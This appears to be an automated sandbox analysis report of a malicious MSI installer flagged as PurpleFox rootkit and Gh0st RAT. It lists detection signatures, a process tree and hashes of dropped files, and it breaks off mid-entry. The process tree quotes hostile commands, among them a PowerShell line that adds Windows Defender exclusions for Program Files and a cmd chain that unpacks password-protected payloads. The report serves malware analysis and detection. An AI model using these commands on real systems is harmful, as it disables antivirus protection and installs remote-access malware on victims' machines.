Analysis

  • max time kernel
    150s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15-11-2024 04:28

General

  • Target

    fd6e356f17c7db639084ea710174ed0c4ca6c43cc701525f855f241653d47e2d.msi

  • Size

    242.2MB

  • MD5

    4393f1aeb2effbba1df28ca5057e2182

  • SHA1

    ca2985c1f08350363b1b62756035b2982b787ab6

  • SHA256

    fd6e356f17c7db639084ea710174ed0c4ca6c43cc701525f855f241653d47e2d

  • SHA512

    3e655488342b8be0038049b8193da42481c4c2a868ca613f311095d656539d35f01c865a7cb44eb7227ca1ae1ad5b63199a6ba84644dd26506ce6256638d5ed7

  • SSDEEP

    6291456:oLKBfaA+iLH02im/1aOUiWuXsiHDqzGw4w:oLWfadiL1B/1/UZucfzT4

Malware Config

Signatures

  • Detect PurpleFox Rootkit 4 IoCs

    Detect PurpleFox Rootkit.

  • Gh0st RAT payload 4 IoCs
  • Gh0strat

    Gh0st RAT is a remote access tool (RAT) with its source code public and it has been used by multiple Chinese groups.

  • Gh0strat family
  • PurpleFox

    PurpleFox is an exploit kit used to distribute other malware families and first seen in 2018.

  • Purplefox family
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 1 IoCs
  • Drops file in Program Files directory 23 IoCs
  • Drops file in Windows directory 8 IoCs
  • Executes dropped EXE 11 IoCs
  • Loads dropped DLL 20 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 22 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 31 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\fd6e356f17c7db639084ea710174ed0c4ca6c43cc701525f855f241653d47e2d.msi
    1⤵
    • Enumerates connected drives
    • Event Triggered Execution: Installer Packages
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:1652
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4048
    • C:\Windows\system32\srtasks.exe
      C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
      2⤵
        PID:3216
      • C:\Windows\System32\MsiExec.exe
        C:\Windows\System32\MsiExec.exe -Embedding 48A7572FFAA34358BC889E9E71D5B4B1 E Global\MSI0000
        2⤵
        • Drops file in Program Files directory
        • Modifies data under HKEY_USERS
        • Suspicious use of WriteProcessMemory
        PID:2228
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\UpgradeValiantSupervisor','C:\Program Files','C:\Program Files'
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:5044
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c start /min "" "C:\Program Files\UpgradeValiantSupervisor\QuKXZsRXURIinRpoBrKGXnAQNKrytv.exe" x "C:\Program Files\UpgradeValiantSupervisor\XKYmrPWFxyBWJVhaoMMkJtrOmLOXqQ" -o"C:\Program Files\UpgradeValiantSupervisor\" -p"216407uRm!g5%as}S}It" -y & ping 127.0.0.1 -n 2 & start /min "" "C:\Program Files\UpgradeValiantSupervisor\QuKXZsRXURIinRpoBrKGXnAQNKrytv.exe" x "C:\Program Files\UpgradeValiantSupervisor\lZUcUGIkCrHpRcYmglgTBsqAioyfvZ" -x!1_ZhObbZwOavDN.exe -x!sss -x!1_VDHzjIgYYVtDUEXESCkEnfwqxTFttd.exe -x!1_ -x!1_ -x!sa -o"C:\Program Files\UpgradeValiantSupervisor\" -p"39895lK3p$:%-WI>c*Z|" -y
          3⤵
          • System Network Configuration Discovery: Internet Connection Discovery
          • Suspicious use of WriteProcessMemory
          PID:3012
          • C:\Program Files\UpgradeValiantSupervisor\QuKXZsRXURIinRpoBrKGXnAQNKrytv.exe
            "C:\Program Files\UpgradeValiantSupervisor\QuKXZsRXURIinRpoBrKGXnAQNKrytv.exe" x "C:\Program Files\UpgradeValiantSupervisor\XKYmrPWFxyBWJVhaoMMkJtrOmLOXqQ" -o"C:\Program Files\UpgradeValiantSupervisor\" -p"216407uRm!g5%as}S}It" -y
            4⤵
            • Drops file in Program Files directory
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:632
          • C:\Windows\system32\PING.EXE
            ping 127.0.0.1 -n 2
            4⤵
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:4212
          • C:\Program Files\UpgradeValiantSupervisor\QuKXZsRXURIinRpoBrKGXnAQNKrytv.exe
            "C:\Program Files\UpgradeValiantSupervisor\QuKXZsRXURIinRpoBrKGXnAQNKrytv.exe" x "C:\Program Files\UpgradeValiantSupervisor\lZUcUGIkCrHpRcYmglgTBsqAioyfvZ" -x!1_ZhObbZwOavDN.exe -x!sss -x!1_VDHzjIgYYVtDUEXESCkEnfwqxTFttd.exe -x!1_ -x!1_ -x!sa -o"C:\Program Files\UpgradeValiantSupervisor\" -p"39895lK3p$:%-WI>c*Z|" -y
            4⤵
            • Drops file in Program Files directory
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:2956
        • C:\Program Files\UpgradeValiantSupervisor\ZhObbZwOavDN.exe
          "C:\Program Files\UpgradeValiantSupervisor\ZhObbZwOavDN.exe" -number 111 -file file3 -mode mode3
          3⤵
          • Drops file in Program Files directory
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:1768
        • C:\Program Files\UpgradeValiantSupervisor\WPS_Setup_18608.exe
          "C:\Program Files\UpgradeValiantSupervisor\WPS_Setup_18608.exe"
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4752
          • C:\ProgramData\kingsoft\20241115_42958\WPS_Setup_18608.exe
            "C:\ProgramData\kingsoft\20241115_42958\WPS_Setup_18608.exe" /ThemeIndex=#ThemeIndex#
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Modifies data under HKEY_USERS
            • Suspicious behavior: AddClipboardFormatListener
            • Suspicious behavior: GetForegroundWindowSpam
            • Suspicious use of SetWindowsHookEx
            PID:3504
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Checks SCSI registry key(s)
      • Suspicious use of AdjustPrivilegeToken
      PID:1624
    • C:\Windows\System32\WScript.exe
      C:\Windows\System32\WScript.exe "C:\Program Files\UpgradeValiantSupervisor\ZhObbZwOavDN.vbs"
      1⤵
      • Modifies data under HKEY_USERS
      PID:3732
    • C:\Program Files\UpgradeValiantSupervisor\QtrVrzdIjlZB.exe
      "C:\Program Files\UpgradeValiantSupervisor\QtrVrzdIjlZB.exe" install
      1⤵
      • Drops file in System32 directory
      • Drops file in Program Files directory
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:2904
    • C:\ProgramData\kingsoft\20241115_42958\WPS_Setup_18608.exe
      "C:\ProgramData\kingsoft\20241115_42958\WPS_Setup_18608.exe" -downpower -ThemeIndex="#ThemeIndex#" -msgwndname=wpssetup_message_E581047 -curinstalltemppath=C:\Users\Admin\AppData\Local\Temp\wps\~e580e72\ -msgsmname=Global\_wpssetup_message_sm_DB0
      1⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:4860
    • C:\Program Files\UpgradeValiantSupervisor\QtrVrzdIjlZB.exe
      "C:\Program Files\UpgradeValiantSupervisor\QtrVrzdIjlZB.exe" start
      1⤵
      • Drops file in Program Files directory
      • Executes dropped EXE
      PID:3548
    • C:\Program Files\UpgradeValiantSupervisor\QtrVrzdIjlZB.exe
      "C:\Program Files\UpgradeValiantSupervisor\QtrVrzdIjlZB.exe"
      1⤵
      • Drops file in Program Files directory
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:1412
      • C:\Program Files\UpgradeValiantSupervisor\ZhObbZwOavDN.exe
        "C:\Program Files\UpgradeValiantSupervisor\ZhObbZwOavDN.exe" -number 248 -file file3 -mode mode3
        2⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3432
        • C:\Program Files\UpgradeValiantSupervisor\ZhObbZwOavDN.exe
          "C:\Program Files\UpgradeValiantSupervisor\ZhObbZwOavDN.exe" -number 62 -file file3 -mode mode3
          3⤵
          • Enumerates connected drives
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Checks processor information in registry
          PID:2676

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Config.Msi\e57dc09.rbs

      Filesize

      8KB

      MD5

      1411eda46372611001a29f5b8c2a3abb

      SHA1

      96991d37cfacab578cb34209f236a46f48369154

      SHA256

      6ce6e16c2baacfa9998e19e6df8fd20136be7b304764f9f49686a9e70fb0e2f0

      SHA512

      c9cb72571c5b60af60b4bc39729d92a462a87613bd13ac245c521b993d1847631ee193c1b5a2762fde17b2ef67f8879ea80c9a09f7ee37c218d1a618a2d57363

    • C:\Program Files\UpgradeValiantSupervisor\2_ZhObbZwOavDN.exe

      Filesize

      2.1MB

      MD5

      124b1390f39511fa043e99578d4fad57

      SHA1

      9f2e13afe318878167328104b6710ad53f1f168b

      SHA256

      f65559e20b9473aa23450850ac2a0a6d6045a8987236db6ff9b2b3e448e569e9

      SHA512

      eb0d19da7f3e775ca6e36f0c51f7a83116a16b6096dd0c5e42ef23a4cdcf2cea805e928092c2adc6c78138455b2b2fb7f62dfe287ead2fb3ee7dd0e86f16c9ac

    • C:\Program Files\UpgradeValiantSupervisor\QtrVrzdIjlZB.exe

      Filesize

      832KB

      MD5

      d305d506c0095df8af223ac7d91ca327

      SHA1

      679cb4c763c84e75ccb0fa3475bd6b7a36e81c4a

      SHA256

      923111c7142b3dc783a3c722b19b8a21bcb78222d7a136ac33f0ca8a29f4cb66

      SHA512

      94d369a4db88bff9556a1d7a7fb0188ed935c3592bae09335542c5502ec878e839177be63ac3ab4af75d4dc38a3a4f5d0fd423115ac72cf5dd710c59604db796

    • C:\Program Files\UpgradeValiantSupervisor\QtrVrzdIjlZB.wrapper.log

      Filesize

      280B

      MD5

      bc3796a02ccf42fc5467520a0d11457a

      SHA1

      3c11d6b91379109d53c1cc7f2b0d2be22fb92af3

      SHA256

      40555400b90ba6a023ee485ff059365d944e0f8a155a8e1c8b943a2f475593c6

      SHA512

      8e048c09e84fbe86f01b9e5bf5daa4201d256d224b7712433d1aae89a888bd23dcbcbef0b592bb9d64a8b46aef5b079791bb7684311dc19256e1cda91a8ba62b

    • C:\Program Files\UpgradeValiantSupervisor\QtrVrzdIjlZB.wrapper.log

      Filesize

      443B

      MD5

      40f1946d105b556da4cd175886cdbe99

      SHA1

      b29c13fdbdb7f350e7c2fbe78db59b0ee022c12c

      SHA256

      e90b6adb3d4ff7dcbd17f76989d0d39226e323295f5a31a3c6c0862a4239b37e

      SHA512

      b6d6414bd16171ffc81cfb99a37070282e4679c2361af822d8b9048b11df69f42ed9da11e83154647d99ec5e4410b2efcd3374b0532aabea5817901696445511

    • C:\Program Files\UpgradeValiantSupervisor\QtrVrzdIjlZB.wrapper.log

      Filesize

      507B

      MD5

      80629f451409b29ff181b0ef0bc948cb

      SHA1

      23df4bf65801774c9a0a2e8c2fb1c54c5017b52d

      SHA256

      7cb4520f06cf001c46e38bfb721f9d0e2475be77c26ed1939020e6b12d78f968

      SHA512

      17ce98d46968f7a16a70e264f23ecb2a6016489a2053a29e1cfd072345b14952efb9ac8a7415e8c558097a93356b97d6e403fdb83f92adaddd12a4608e80af23

    • C:\Program Files\UpgradeValiantSupervisor\QtrVrzdIjlZB.wrapper.log

      Filesize

      753B

      MD5

      6bd1477294da4f9ef97dfdf4b4244b6c

      SHA1

      f431a2f4f70cb2de267e17b83366a20a1d75962b

      SHA256

      73b591373aefaf8c43810d0cfcd79e5891a046a829bdbba04256f6607074932b

      SHA512

      ebbd62dfa4fc1c86871b96ce7a23018d0ece25e1caa1ff6b71f785db05cd7fc55adae02ad2f1782ed279f80b788c30c16854f183f0799c2b245a5b08fb69275e

    • C:\Program Files\UpgradeValiantSupervisor\QtrVrzdIjlZB.xml

      Filesize

      436B

      MD5

      a8dfb5c5b3a332807549a2558bc1fa23

      SHA1

      e5984cb0b66cda5f32990026f173526ac3e332c5

      SHA256

      5a919e7daef00b56eecfbf48a01f77187becd2123a46812c5e0b1590fba4b3a4

      SHA512

      bcefd46b515ab4d80e2dcad23d45cc542cc9a37b757d3517ba1d00e7e7d5459a312255a74cfdbd074a55c2c5da617292977c3a7dd7e2875472c5f77451372ea7

    • C:\Program Files\UpgradeValiantSupervisor\QuKXZsRXURIinRpoBrKGXnAQNKrytv.exe

      Filesize

      577KB

      MD5

      c31c4b04558396c6fabab64dcf366534

      SHA1

      fa836d92edc577d6a17ded47641ba1938589b09a

      SHA256

      9d182f421381429fd77598feb609fefb54dcaef722ddbf5aa611b68a706c10d3

      SHA512

      814dcbc1d43bc037dadc2f3f67856dd790b15fc1b0c50fa74a169c8cc02cdc79d44f1f10e200ef662eee20cd6b5ca646ec4e77673e3fe3cb7dfb7649243f6e99

    • C:\Program Files\UpgradeValiantSupervisor\XKYmrPWFxyBWJVhaoMMkJtrOmLOXqQ

      Filesize

      1.5MB

      MD5

      0a73dff245b9dd0ef7135a3ce13c658d

      SHA1

      8776a42095dd0373fbd6fb810ce427ec8259cc66

      SHA256

      f5006ccdb830241f30c9c2cc0fff2aba502369dff0f402db65fb8033a4562fc8

      SHA512

      be1b38507c4090f5a3010c114322c0b039e5606efb35d3295d466e4a8cf88be228645fb3131bf6a51b25cbda8b3e49b88ea2336f01d7bf994dbac6e595e257c1

    • C:\Program Files\UpgradeValiantSupervisor\ZhObbZwOavDN.vbs

      Filesize

      2KB

      MD5

      31cb7c228337b05b262877c9d1d31f40

      SHA1

      c67ef4beb96061c1bdf53334e125dde65d079e2a

      SHA256

      f3acc593d2324d95131363105f89f5e97a0d251a997eab95486b8f0ffe76baee

      SHA512

      fda05de734d8dadd6250687bdd9e74a1ee833f860ddb296faac2e7c1251cd2a346e31e68590d6694ab504982815482b888b9328ab5248a431d6ae9df30997be8

    • C:\Program Files\UpgradeValiantSupervisor\lZUcUGIkCrHpRcYmglgTBsqAioyfvZ

      Filesize

      1.5MB

      MD5

      a8c7cb63bdb51e60bbbb6ff4474015b1

      SHA1

      250280ba33a0784bc5c00be39f5c297683db0935

      SHA256

      960bc0889a671757fa66e98e5a0d3aa8c3b839b884a88ab4f40ebff3025eb6d8

      SHA512

      e020225fbcfa53cdbe41d55ca5dbfd49b72428ee58bbf2dc769d401c39056af8cdc8bd1ee80da76eed86b4af7a5548e3b113d012f4ae29b97614abceb194db71

    • C:\ProgramData\kingsoft\20241115_42958\oem.ini

      Filesize

      1KB

      MD5

      920068869d99afbee8244a2be1e667dd

      SHA1

      4fb5d143480d258cb4afa9d009b303a08fc9122b

      SHA256

      53b4432efa05bb55dec931a4641e32a6dccae3fb4730bf66bab2fe58df904d2f

      SHA512

      466623f31264a788fbf83589f8d5601ba1797d9df21da04fca5a13ff25678ddc3291d3086fedfbf5829a1eed93a67759af704c51c38c3378202c34e242eae8da

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_u4qaz0w0.rmn.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\nsa607.tmp\AccessControl.dll

      Filesize

      13KB

      MD5

      28c87a09fdb49060aa4ab558a2832109

      SHA1

      9213a24964cd479eac91d01ad54190f9c11d0c75

      SHA256

      933cadcd3a463484bbb3c45077afda0edbb539dfbe988efad79a88cae63bf95f

      SHA512

      413b3afe5a3b139a199f2a6954edc055eee3b312c3dffd568cfdbe1f740f07a7c27fbf7b2a0b6e3c3dd6ee358ce96cc1ca821883f055bf63ddebda854384700d

    • C:\Users\Admin\AppData\Local\Temp\nsa607.tmp\System.dll

      Filesize

      11KB

      MD5

      0063d48afe5a0cdc02833145667b6641

      SHA1

      e7eb614805d183ecb1127c62decb1a6be1b4f7a8

      SHA256

      ac9dfe3b35ea4b8932536ed7406c29a432976b685cc5322f94ef93df920fede7

      SHA512

      71cbbcaeb345e09306e368717ea0503fe8df485be2e95200febc61bcd8ba74fb4211cd263c232f148c0123f6c6f2e3fd4ea20bdecc4070f5208c35c6920240f0

    • C:\Users\Admin\AppData\Local\Temp\nsa607.tmp\v6svc_oem.dll

      Filesize

      192KB

      MD5

      500318167948bdd3ad42a40721e1a72b

      SHA1

      24134691693e6d78d6eb0a0c64833c12a0090968

      SHA256

      d3378ee739debcaee8c715963403d96bf025db98bfbb55e54635429890db85c6

      SHA512

      0a2d3b55528cc53cfce5b47158997300c562afd2c7bb5596532b218d3f482380887ee7c204b13d42425dc0c4cc439a7f9ed167f3767bda7b6e205e7e8f454863

    • C:\Users\Admin\AppData\Local\Temp\wps\~e580e72\CONTROL\office6\Qt5CoreKso.dll

      Filesize

      5.0MB

      MD5

      e847288468d4daadcb8f5a8bb152e923

      SHA1

      574f7b2d1def9d79c4257c4268246fb399041bf6

      SHA256

      dc450ada7d31c9df923803e687c87dda9b9bec5e3f0efef6a30206872c9559a5

      SHA512

      b0c939485c7ab200837f8f4eb1da305644457825611a6d829cb6f789e486ef69ef4716f152e487b599f85cddaeb53808e71e3e016b4f7b4c4a71a2506586e133

    • C:\Users\Admin\AppData\Local\Temp\wps\~e580e72\CONTROL\office6\Qt5GuiKso.dll

      Filesize

      5.3MB

      MD5

      c79bc97c4dc3a9f6beff0d18a0916b15

      SHA1

      3cb0b6ae6fd034ee24511c8ecd91c16d73d2b76a

      SHA256

      0c490173ab692710614f42dde8cf643aec26ff4636dc25d778d1444fe90368ea

      SHA512

      df1475695972a4c17401a4552e43eb249a99c77c3292c42d48a64964bcd10534fa006ab09124acb197b0b27283042afd0e9163953f824507ca2279c04a82d147

    • C:\Users\Admin\AppData\Local\Temp\wps\~e580e72\CONTROL\office6\Qt5SvgKso.dll

      Filesize

      392KB

      MD5

      d7207f0e20b9ec71399fb9914ffb8278

      SHA1

      e862601902fb95f2cd2b79370dc0547cf382ccd5

      SHA256

      6b47184545802c689971608dea86a2e7925b21714db800afd56a5eb40398dcc0

      SHA512

      59afd7add23f80bbe0d3df5be60226b1a80133439b2b6f217a67db1911d3adaba6b360b29f4debf6ed9574619521dc3677248185ad9cc6870488565309f1a3e8

    • C:\Users\Admin\AppData\Local\Temp\wps\~e580e72\CONTROL\office6\Qt5WidgetsKso.dll

      Filesize

      4.5MB

      MD5

      e680d10a2632b3bcc9e87790b11c9fc5

      SHA1

      c97b51036952a79e7173e672f59492487902952a

      SHA256

      ec89fe25ce694fa68c80aab24cef732c0d9d102b35f38b946cdcce517b5ad329

      SHA512

      cb6284236c3259bbacc2f90cb6ac059ef9da9d03277df21ac0ec69eb0132271a346477e9305875d4723f6f3327d04fd5f5bb26a9b39d8e8b7c94fea57a83dceb

    • C:\Users\Admin\AppData\Local\Temp\wps\~e580e72\CONTROL\office6\Qt5WinExtrasKso.dll

      Filesize

      217KB

      MD5

      4df516604e20d8defb35aaf0fb16a2b5

      SHA1

      6b34b3fcb1da882e6adbd78f1aa38bfc4710a098

      SHA256

      4c7efb65779f1b988bfc12623e042338061bd123a89b8171c7db7ace7d416628

      SHA512

      cd7d4b005f1ff7fbdfbb15da4ffe5513fcb741b2088fa42560f45b6fe4f3dd97efb78c7a2ec49b0ce8a0dc4a5fe237f4ffc68ea6c8b6a048718876656fb5282d

    • C:\Users\Admin\AppData\Local\Temp\wps\~e580e72\CONTROL\office6\kpacketui.dll

      Filesize

      1.9MB

      MD5

      283a731e55f15516cbefe175ced45d26

      SHA1

      59eb1520c7b7f1ca8faa494426d6c9a64c15e145

      SHA256

      9fa73aeb2092080fc29f80f3a1287c1740ed4eb85f883c87be385c846b9b47fe

      SHA512

      7dc7da18fe2376780ccc226ee1caf7eddb38edc4540fab8c2e5a9589dcdea3b8218fb483df2e8b5c5df358e484b161292399340f4e1ea06b71464b05b220643b

    • C:\Users\Admin\AppData\Local\Temp\wps\~e580e72\CONTROL\office6\msvcp140.dll

      Filesize

      427KB

      MD5

      db1e9807b717b91ac6df6262141bd99f

      SHA1

      f55b0a6b2142c210bbfeebf1bac78134acc383b2

      SHA256

      5a6dfa5e1ffb6c1e7fc76bd121c6c91305e10dd75fc2124f79fee291a9dd9e86

      SHA512

      f0621977d20989d21ae14b66c1a7a6c752bfd6d7ccc2c4c4ec1c70ba6756e642fb7f9b1c6a94afadd0f8a05d3c377792e4aa4c1a771d833c40a6f46b90cbe7c3

    • C:\Users\Admin\AppData\Local\Temp\wps\~e580e72\CONTROL\office6\qt\plugins\iconengines\qsvgicon.dll

      Filesize

      61KB

      MD5

      b2555aac6faa3c776c7963538e3d642c

      SHA1

      01d7a80ce29872195770b6a76854d4e0e5576325

      SHA256

      894172fcd20aa7bf493cab6599d04102208810be1b080d0ef8422b047cdb3c3f

      SHA512

      0571aed245f8d62d387315a27d485b1154a8664e4db96fb54a67eb2c19ccbd547040378240d60d67668867f715da7775bbe86794329b48ae27e6a5f787e63109

    • C:\Users\Admin\AppData\Local\Temp\wps\~e580e72\CONTROL\office6\qt\plugins\imageformats\qsvg.dll

      Filesize

      41KB

      MD5

      90b1c6c13aa734636f94ac73d295c87a

      SHA1

      d5a9ab0696de39719bdb9bb71eb35353a8552525

      SHA256

      d62301457c3751ccb81d1a069491ef2ead1379b7910bc763f2d17969efea0406

      SHA512

      94a4a35294cb1ce7cf233fa95825b989fc7553a9ff78e23284aa592874fc01816fd765ecb800c030a6f92eac2ba69b1d2aad11600a2caa2afeda22e2d1b1325d

    • C:\Users\Admin\AppData\Local\Temp\wps\~e580e72\CONTROL\office6\qt\plugins\platforms\qwindows.dll

      Filesize

      1.3MB

      MD5

      b6a37f22541908b36755c1b2907f4972

      SHA1

      1327b11691fe35918cedfaf35b7c3f2c040f07d0

      SHA256

      915bc4bb230e1a33ddca17faa5d1a5d63b33a1382a425d4c7364301283f9b977

      SHA512

      bcace988eae77a67a162aea424920d6ca5ca3b83a4047e450380f67dd6966c47d6b98aeb5b9f05f972f7b4ec39e2ba1cb648997efd62fc82087a24563326b6d3

    • C:\Users\Admin\AppData\Local\Temp\wps\~e580e72\CONTROL\office6\qt\plugins\styles\qwindowsvistastyle.dll

      Filesize

      145KB

      MD5

      ce3eb6e3e6d950fb03ed3753baafd6d1

      SHA1

      cadd8a045a037a9ce10372b0d1a6907f7c9b93d1

      SHA256

      d470ed8b89ef39e86587825e17a0525253a2245c9be125818229d1ece015165c

      SHA512

      02b9fc512fb813e1aa9ee51032d0ba4182ab184883022b46f533df119649e8116869e6be6161681f38d79c1949636ba6309786425f2c1ede5b3f7a16e63a8d96

    • C:\Users\Admin\AppData\Local\Temp\wps\~e580e72\CONTROL\office6\ucrtbase.dll

      Filesize

      1.1MB

      MD5

      2040cdcd779bbebad36d36035c675d99

      SHA1

      918bc19f55e656f6d6b1e4713604483eb997ea15

      SHA256

      2ad9a105a9caa24f41e7b1a6f303c07e6faeceaf3aaf43ebd644d9d5746a4359

      SHA512

      83dc3c7e35f0f83e1224505d04cdbaee12b7ea37a2c3367cb4fccc4fff3e5923cf8a79dd513c33a667d8231b1cc6cfb1e33f957d92e195892060a22f53c7532f

    • C:\Users\Admin\AppData\Local\Temp\wps\~e580e72\CONTROL\office6\vcruntime140.dll

      Filesize

      75KB

      MD5

      8fdb26199d64ae926509f5606460f573

      SHA1

      7d7d8849e7c77af3042a6f54bdf2bb303d7cd678

      SHA256

      f1fd5f6ec1cfe0cc3b66b5322ac97568bc63b19c1e415b99aad7c69ddbafa33c

      SHA512

      f56bf11d4259dbf5d4d1f9fc2ad60ff609cddb21278999e9fa55fe5d74552e8a01ddc55cfdc9bf4b09b3e3130a1356142a24a7db8ec5ea19344de617dc9fa99f

    • C:\Users\Admin\AppData\Local\Temp\wps\~e580e72\CONTROL\product.dat

      Filesize

      95KB

      MD5

      bb7426885c5f57b6b9405fdc7a94cc65

      SHA1

      0a58a34a41cbea358fd57d278e9b15e669cc28e6

      SHA256

      f32133a910d0ab4b64bb7bc33fd5894e1afeb048b83b09336d8b02cd4c7ae118

      SHA512

      3e8d20fc055b9ebbb49439adc69878e2b1c9a11f45400e7155874c031f950e3dc6ece86998366345c85ee98ac091ac319eb2175fd0100e300b9e856d06ef891d

    • C:\Users\Admin\AppData\Local\tempinstall.ini

      Filesize

      382B

      MD5

      6a5eea749583001de63b993fc66496ba

      SHA1

      fd41691ec4751e85be89917d46454f8533800b4e

      SHA256

      bca613688e735ccd1fae7164550bd8ae90862028cd0bf31534c149ea0d7c9f60

      SHA512

      6a5b9b863bf139c87b5734d6e8310c7231a1015d8eceb15f76ccf7676d36f9107fd5d817a6f04ed47c3ee45be409073c837beee3c079abde5bc38233c98b9712

    • C:\Users\Admin\AppData\Local\tempinstall.ini

      Filesize

      428B

      MD5

      5e1b68b67986b1588301c0135f19fc7c

      SHA1

      957ea47285f7d903cce7530ee34852435de5b5b4

      SHA256

      23456d8ce681d1a5a31bf06262e088f4feb8d0e8fdc1d37afa4aa02830ffacdc

      SHA512

      268ec437c5971552dacca1e9ef6850543614d5a7f05ac34b41bf05f73e97e4c694d59e4f0618a57660ffad4f2faee653b4c0c824f97a6e9fddc48d22c52739af

    • C:\Users\Admin\AppData\Roaming\kingsoft\office6\log\setup\wpssetup.log

      Filesize

      7KB

      MD5

      f1e4e2094914a19b784b5baa67366235

      SHA1

      e46175ed0d33016699ee69e6507096d0d36e6061

      SHA256

      642caa154910e6ad5da4e3c61490ad7a50e07c673581da1dfdd303dd9e538f70

      SHA512

      9d6555a33acf019f00101818e9b2979fd0e80d72dca4fc34f08a50d3f32cc0e5d89be23306a237b09c33a8dfb644da9093c51871c3513597d857d760f0283c8f

    • C:\Users\Admin\AppData\Roaming\kingsoft\office6\log\setup\wpssetup.log

      Filesize

      8KB

      MD5

      0265e33cc29419711345539f2ea7805f

      SHA1

      9af3ea6885a77dc33b6733f469e526aafb210ce6

      SHA256

      0fab45f06dc11b27de144521dda022ff883e6abbf1b2f931cc129ffdeca772e7

      SHA512

      1fd31318c23f36f94b6a4bf3f9da5b4eb342f69410e56c316501078ae87724143a775d5bd018169ccb1f84f1725a60342a5950f908ed7f7147d542d9eda9d041

    • C:\Users\Admin\AppData\Roaming\kingsoft\office6\log\setup\wpssetup.log

      Filesize

      26KB

      MD5

      9410ab68bdd28f3c96857f485da23d0f

      SHA1

      3db236c86b1f0a4b9bf89e679bf357b31a8425d5

      SHA256

      f9e040e3bf92f2e3763733d5beb86af9cbc347a7bd396efcdbcda6aae72dcead

      SHA512

      08c1a0ed862659cc334d4d30cec06c0e4c26a25bd8fe56ae0cf1b39a27660dd7a898e5420381fa46007b5c83416eae06a8a9ed99a030d7b6eb1a794d7a80514c

    • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\QtrVrzdIjlZB.exe.log

      Filesize

      1KB

      MD5

      122cf3c4f3452a55a92edee78316e071

      SHA1

      f2caa36d483076c92d17224cf92e260516b3cbbf

      SHA256

      42f5774d1ee4cae5d7a4e83970da42bb17e61ae93c312247211b5ee3535662e0

      SHA512

